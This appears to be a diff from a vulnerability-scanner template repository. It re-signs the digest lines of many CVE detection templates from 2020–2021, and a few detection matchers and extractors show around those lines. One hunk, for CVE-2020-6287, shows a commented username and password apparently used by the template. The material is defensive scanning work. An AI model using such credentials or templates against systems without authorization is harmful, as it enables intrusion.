-49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e23ab89fad66085d2ab6cb456e4c728a76f6e0356382f5a3dd513a6fd51542b0221009f4227865760ac839ec656f971b5230460f06c7e99b7e78779556b224ce7a7fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eccf4156b2e2e18eb2dbae3fc7603bc29df28024442602931948dded760b785f022100e40a5a478ca7951d3f97fd2e55b23775c28f57b7517e6eb0a14019fe7ffa7db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6207.yaml b/http/cves/2020/CVE-2020-6207.yaml index eca65ab4a1..da0022f446 100644 --- a/http/cves/2020/CVE-2020-6207.yaml +++ b/http/cves/2020/CVE-2020-6207.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206f10f6390a1f28d284757ba7222f8e714ac03076c664a8120f972e03a1f21b0e022076e4a6fb68aa6b3cf516332820510096fc1215afa44a1de9d081510ecac38195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc211a6f15e2d9da18741daf6c7870c6f5daee34aebda3c2bdd8f28487937b37022100f8bef262549855c3aa8f22f095ad8c63bc1c001f07ab9a155189161908158114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6287.yaml b/http/cves/2020/CVE-2020-6287.yaml index 1b9566f020..7e6308a5a3 100644 --- a/http/cves/2020/CVE-2020-6287.yaml +++ b/http/cves/2020/CVE-2020-6287.yaml @@ -64,4 +64,4 @@ http: # userName - sapRpoc6351 # password - Secure!PwD8890 -# digest: 490a0046304402206c4b14491ea982f8a08dec5bcee88849e6ebc6b36ce428baa9d12c28e5893bb6022032ff0dcf67cb9db8e3042c6245bb9c3aa286d537c7f1c46e8a741f955b60bcb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed55a6fe121b73240a6bc9d941e925ac76e3af9208538db9a4e0a493b1fec75c022100dd177ebabad849088afff4288e441aba053913f9d1bce107402f073a59d7469d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 84b58f246b..332f8a554d 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022018750f0e8502dd291ed8d45bff59f86bec81babc9ea9b413e6447a90544c50de022100ab7a78866d15bc653144d93e47bf47daea15d96bee6b942339ef913d90181e9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086573a79c38b4565b7ea2c75147a37a018cdf1924efe5858b5a38210182561ec0220030416009f9312814258733fe6dafd09719c680ac3f88e15633697e2212e99be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 546a4901c2..ee66ec22f5 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and -# digest: 490a00463044022057bb165b69bcd6a648332fd9637fcd2daef818312700aca402b735e74e3bab7a022039da250736c313317b03ff12fb722f320b0ecfd1338eab919975feb262de5717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abe906a6be65b9c025bc7704c029fb1a4dc0cbfce72a7747b5c7a674e768784a02206828d072af3bad693412d0342d807eb460729dbf0e2ad2a45913aa3775953abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index fed8d4aa02..ff117d3bab 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a98c36c0d43554a80a17b855979ba9b1afd278daecb5f8105fca20d49ac064d4022100b582ef9291592f99197ce65d483f2f18702a4dace55e3b8e7f2fd8626364c8ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b63228ba9f20bbca3a065519c393892647b7fdde35d3cc5088efd66facabcfcd02210086c3a30e6d9a904622edc028b04502f0e8ed9ad7293b1d28c41b2d477cb3a03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7136.yaml b/http/cves/2020/CVE-2020-7136.yaml index e74fa6b18e..8311d111ec 100644 --- a/http/cves/2020/CVE-2020-7136.yaml +++ b/http/cves/2020/CVE-2020-7136.yaml @@ -58,4 +58,4 @@ http: - '"sessionId":"([a-z0-9.]+)"' internal: true part: body -# digest: 4a0a004730450221009f65af7463005817eaf2c8b1d20ecc91865dc0bc33b2e3eb7d8ee11b885a7a7a02207baf70efdf4cb2b174edd1bb6a8c71233fb6f7d3c54f74aa1b93db5446ddb5a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f21a3589f99bf14fc6554b6dffad8b24bfa290932eff97c788ee82cbfbda667022100da8948a7b02d1255b30707f199eb686e5ef751ed789ea86ef814de2f086b6bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index 0caa7b0e98..6cf5af47c4 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d1cb22987ed6f50f9a8450307b04fb97cb6b3c321c80b9f0488e23e96fcb37f02204df7d0479846817a8336b7fcafe8afda2777f7e03883335b649b88afa68341cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb60eb2a7ed8164d33e50962d0d82ae90c32969b89bad729bd3f36a4fb228926022100fd28bd5d7df38adc079263e18d7e3460bab67a6f697c8df2237f9765b19576ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 67780e7931..a94955d0cc 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -43,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100c32049f90bd86f8d7752cf970acd2afd5150fb0a7d5ffd4b42477b733a9fdb0c022100ad42c6fbacd75f19232f08f7c3590d37f61dc7931ccc81dd74992232dd9633e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100863add007d17d603e60419b217e08c75160f9acae86361fd0935f1056ba9c4310220387cc7b5f8836dc5d8a20c7ae91fe8f60c3b467b3eab8cf5105e8d64bff9ce47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index f731983123..6411901d2f 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206792db6fdd8e464da8351b87ddbba9a963f88f46d4f033c091fe6c389244575d022100fba0ea89c7927a275a26e5c8af022bbc1396176d3062c626ebf54a7fd9215679:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1666bc4bb4986e4dce6f31b2c1484850d1bc0905ac7ad4b1953b7581b1fe21d022100d616636f1f8420750a310f2dcee88eca1f793859493d8ebd0a3bb2062c64b495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index f125c68bcf..a7628b92cc 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -63,4 +63,4 @@ http: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" part: body -# digest: 4a0a00473045022071f597a8c75493532cfd3eaadfa6c8bbcaea6a87a45925358b9bcc0a50aa1d86022100c8b38b6ee54a0e95d8f18b3065c202b3f8f14b17ed17622dc24bb8b61577b3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b078ca58bc844a1032faebb69311a2fcb83c43a69c3d4283d7e2083fb72ef1b02207a29a7d6998b92d145c1834995eafac96c2f949ccc27157b60dec4a7fd509034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 758004ac96..506042020a 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009feeceef542c46a8cfdd7536e65c7febb80c5c9894b5b3f479c7231e51eb7052022035045f855c47d58f4c2a3114b4f144d05ba0b35256c280a03c424591d29b44be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index c5e4150a32..80dc34b36e 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202281c77cd44460978380c0e81c7ecb788518a1ef2891f50395a869f5afffae68022100a72bc525d6b1e771166cc67870ec31fe56551193440b4622c8652b3c5510ff13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa784325a075212b3ce0376865f96c93c378ab99f4faeab9555776ec9f016c8f02200d54da34c1a8855ddf5491aee9b943191c45503351855984c257397f86a7b24f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 9a73648b69..3d53164f26 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210095f2004035f79cbcb4af27718650ade78e8f25da899e3692309e6ddbcfe39faa022059a57f2c0fa7b3f659a52948e81555e06688f8163061909b9c5647d723f90de6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220623563b3e9081c12b53bbcd5971946c9c090aae5e094e9ee713197bf3a3adc310221008128e62b99d5783f3471f785906e2c3b866514cad77898df0bd2c10a326a190b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index ea8b81d24a..23f89efcde 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024dcfb977f8e9977d9363d303d40f2267b3a85036968987ab62443171eef46a4022100c4694949e1496753150bcac302501f45335d93836cd76f7569f8af58e2992340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206617e4956f9404435cacd0175a72eb6deb5b1eead694622dc445086a67a221db022072a353f4336bd25c50f2cafca5951b2056e8b0e4937b2ae92d665df184f60d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 693f102373..9939732f02 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -80,4 +80,4 @@ http: - "(?m)[0-9]{3,10}\\.[0-9]+" internal: true part: body -# digest: 4a0a0047304502200a40fbcd2be6f6e3f74c8672c222c2fb30213a6ad086641b213481f80ad09f66022100d1466bbe3255aaff3b150fda8bf77ec553d990b3079a9573e835cf7273d4accf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d40bce3020167c49d51e3597d35490d58001b7b365f70f80196485665f264fd302200691364c0a37cea8c22c160ef5e40058241e48c8d290d590a897ea7c095e8a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index 78f9a297ff..f5192bfd3e 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af1818c7f41234374edabf5cb8c41a1f1f2b0006f1ad792cc58aa2617de103160220625f87c03f8a6d85ac8db0b8598f26a7b1324d62edd1e9420071b0d8c83e2610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220525b0394b9d3a28ef8154f941916bbd498f3cdbe8f8a1f5b006ba60e63d2f8b3022100e2246c5df27c07e8483bda40820890e1c9465dc46f0b26a5a28304d4c9780775:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index c67bd036a0..e68eb53a12 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220144c263851998fa91377497074b757f9895d6aeea41149f1d411839b7f4a5d71022100f6ac53a3009610178242836e265a702b8c72cedd972b57d420d924c438483336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e97d1bee3987941ccf2372d28ac983dac0ffa6d92d7cf641482f98a5e6bcfdb6022100f340b0edbabef04b09a3442c2045a18383ddb00569e52f9e03b1fbfee9d23d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index fe8f69eb47..3935254e22 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d0846edf7e8e6118bd01670c01706ad026f58b9b53ef7cd70a6606c4c693f6d02206b183f00c8643042b064c49c928b48fd987a03476c663cd827dd563793cf11ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc8898ae7a0980f4243804b7ff22a9b8ff38f04d83718dccf79985b33619939b022100dd4fee008abfab68aef6ab24b8f04ea785c96f5ab20dd884b031316f2aef002f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8615.yaml b/http/cves/2020/CVE-2020-8615.yaml index 0c2c04062a..5e053f6840 100644 --- a/http/cves/2020/CVE-2020-8615.yaml +++ b/http/cves/2020/CVE-2020-8615.yaml @@ -60,4 +60,4 @@ http: - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100de6de457bb118ab6c4d6b4b82ab6c8ff87768dddd14a369a687a3192e06b4e57022100b77038f1401cb94826ab4e530bebe15addac7087506d0fb7356d04f7c66468f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002690dda68624c701141ce244fde09b3ae3756aabb82fc252b5ab8b9fede8d59022100f97d870328ce4b27454781d44526befd0aa74459a07e4121c04a578338d9da24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index d8934eccdd..38542e754b 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1ececd05341a5a1bef5c9da1c0dfda7428c31f46f8abe790aa333141dc7004e022100c929cd89b883f1951676f34e2109adfac476702f5883f91216e42df3df792754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090e3d7f58b6d051bba34a7f85dd0a9d86c32a96e9deef39025d3169838daf78c02201e61d3f1f2704140a962c8563bc75ccb38d7009c0dec06fb5fadb07aaf0cd6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index 692a91b3ba..77d2ba8bbb 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml @@ -65,4 +65,4 @@ http: - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input attribute: value part: body -# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8a0aa9b72c7bcd55f9163162b0bd8f9fb7a6ca107e55a46fa5b22f42ff1d194022100c8e13cd8e692b9430c30e0ffd48feda71f8863a9947a6454d0082f1b3ef8b598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index d3fe2585a3..d9ed1fa1a2 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -80,4 +80,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header -# digest: 490a0046304402203291fcf479be6ac8ef870d1f4d03c92df6410ee75121d38addd0c9377d8f40f7022020886d69171d32958ad6b8f1d435f68f1521494a7169dedcee8a8830052aa695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202450cd97ccd6437e35260bc6760f8d0d22bcfe0c954e842dc097917c98e04bce0220219b6a7bcfe2f47d2428eae01953e898adef91e82a82ac76fad864729fbc0419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index 0d93a8033b..65de4d1037 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -50,4 +50,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502204ec01dfe89f1f9796f53b43c3f8f9bfff0db4ea3e3eb7da3df8e6f4a15c93004022100a3827d38bc0be92d24eef29752497f720909d1d144850428accdd33dc2a798e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bab5ebb84f2b40789aa2f4c651095367ecf8b4665ec1f4b3f75e96c5765f6287022019534f0ff671a7ef2749ee47ad1a91ed034e31366ea8598dd270b53889840202:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index 52d610be30..234fee7c90 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204412ce229c5877288e6faa77220767561a5fca4b8ab2566f23e2d7102706e67b02200cc521198e9c54a98f3bbaaba12c87827328af30704210e8eb388a6a2df98f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6c7cf12108e441278e1069f8877bda6a4df1b63134472603cafe567ea0750f30221009c3c6fce68358b9c44a5a682228ed945e952f82a37f7f6f5d8d1f525576f21c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index e9fb42ee7c..7a9d4e0820 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2b80e81f9efe58be8ec0d3d891a2338f141a0fe35e0a84de0e7223200f8fdb3022100fa273979e8c86cdf5acb48a0e6efd5b42d10962dcd2b82e270dd8ca259d39c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9cdb256a23fb29cc79afc92af5dfdf974dcc90897da1ac609b1c0135de3c1d9022100d7c106bcf1829aaa0b27e01b7f64812a31aa7464778b826cfc3d965839e42438:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index fb637190fc..77e5f87d33 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206d1b411ea76e89ae1bbd022c4ab57bac51f3fa12b871736779e3d1a35fd883c0022100a71b8922e865146caede677ee0e73b855ba1dad6aceefa4f667aaea98db2e147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201febe633336547f2a72c06061a612cdf30ffadec7bc448666b09d92b419bdea4022016e56b97e19755bf3787c1c885d905a1e7e11cb6dc1e36a66c6c6c8a5b522ee2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 0dcf44ad65..0e2ba0e428 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f1f8769608644c41386a233cb78ccae42d519ed0ec714381e3823a863f658ed602201ec7768a3888515d76ca4ff5c22cc3b1321f45fb03c25603ed94f79898b132b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201102d935d5f0568de929e527b8a79643337300d43ea1d06c8d393897a26846c90220303502d7c3cf8938e0c68e3430c6a195e6fa05b24d1bc68a0d56806aa389cf5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 3d3deabe88..29fd60f485 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e98012a37e1c7449138264fa67d0e0279ae5c6f631e4da99cd419bfc34ce7c0e02204622d06279cc4f997a1f316f033a87f60a7bb8f2219b1b24f27692ca69ed8092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b4839c9662183e844be6af75890ea70fb4cd6e764609151db2fe34feef597f902205575561bae2d0f10da8356d98deb4e71c3ce87a9064ab8b541e4d68416eeb22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 7e9f9b1250..9663db3604 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -42,4 +42,4 @@ http: - "ORA-06512:" - "Request Method:" condition: and -# digest: 4a0a00473045022100ccf3113bbf0b9acac23cb361dc7f354995e653943ccb6f448a8fb6a883c4071302205350ce4634728a65fbf460c2adf249a31f93c769451b8969561f2c1d50f9d980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075e36ab5c487e115ea00c7f220c3c760ddb2a7e2c99cc86a54557fbf27f31a4f022038f3096e089c00be06b58255985930c44d70bd0abab9f21a741b20d247f5713c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 2251099cdf..ab42072945 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097bd62e865ddc5a66964df63555a520511d79d0a43a5efbe2ec58a057de20434022100b3494688001927c623591a7583963320e5605ace9d2a8dc63c05f693ac3e9297:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdcfd569e8342f214eb384f124611a6176542f3db24e58173519e4add35dcc5e022100dbd0609f9302f7b23418fde669ceac781a5db1d080949ab0f1ba6abf680dfeb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index aca7c1bf66..c884944e53 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200c88732807072e4a6338643df18beacf7f55f33b12f14afd156a824a3b356fbd022100cf87ad99a473933a67e31655bbb149fa818e982f9a341cd2d84c75cea140afaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0f153fb5b5a5b46aa5888c17fb78097d6c6cdd3b1a8f811af53e076edda7c00022100dc0f8855a7fcb05d0996a28eaccea216b931ee6d9055ba490f128333a5909486:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index e838f0fbae..109b73e9ec 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206995e8b04712ff12a7cc6259c6023a6f173a130e97bdbe8eeedb0a48258d92ec02210088b782bfd12b1d37ead9da796f4c265fadd35a83d0fdab5cbc2a3352abb19f49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a257f68d7aac9aac5f21f8c40e66cf141b121a49c07feddaf15f26253ee3643022100df7f9ce16f459521c45985041cfb0db3a0f640ab0c98b7b4d5a895233c5f81dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index ad125e7bf5..8f7142b88b 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ecfcc24163fa9d5a764dd7f1d6bc59d23a3cb69c7c3ca9bf2b3d0a9f92d38fba022100f48bd5a9fde0ece8cf3a033e1fde317110d9ef706c9a178ab65cf6f5bad96f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f6cc2c1a5f49519c2cb394d6fcc3729f838aa104d51b4f34c63f57f690b0d298022100b20b204f952796dd8d6786c616c72c0ad7ed8cd733afeced43c49c44445271e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index 7321ccb97d..5b1c40cd40 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -80,4 +80,4 @@ http: part: body words: - '"jsonrpc":' -# digest: 4a0a0047304502207d2afae99f9b9e0f78952b1cccf9209e11e2cab61e200b590312046dcd5acbfd0221009ae723766dfe0df8dd26b8392a3a3c7a690658e170dc65292bdb3dbe49de9ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d22ba62ffdf5abc541c17a02f6dc85ff7d87bcdcc8e0e9b164afcee24e7121c2022100e14e20422ed6f96ce5495276d43d614fa9e28284fbe7200504d8fe338797e868:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 554939b13c..1d4d8e0a8f 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205928b479b0e61672c4d2b20bdeae75d2dba2d325c94c7154aa53b8e88dfc65f202207c82f73333f8276f8f5eb140990b1b92acc361e69b4e1dd8fd134ce4a84b064e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040ee9c4921d9bb639b308cdbac126e72e432e0007630a327aa72c3306de26a050221008e74a90ffb7713a100134f8736b369b84dde3c2d7973cd5613533354313e7aeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 8665fa807e..2aa9ab3a87 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950 \ No newline at 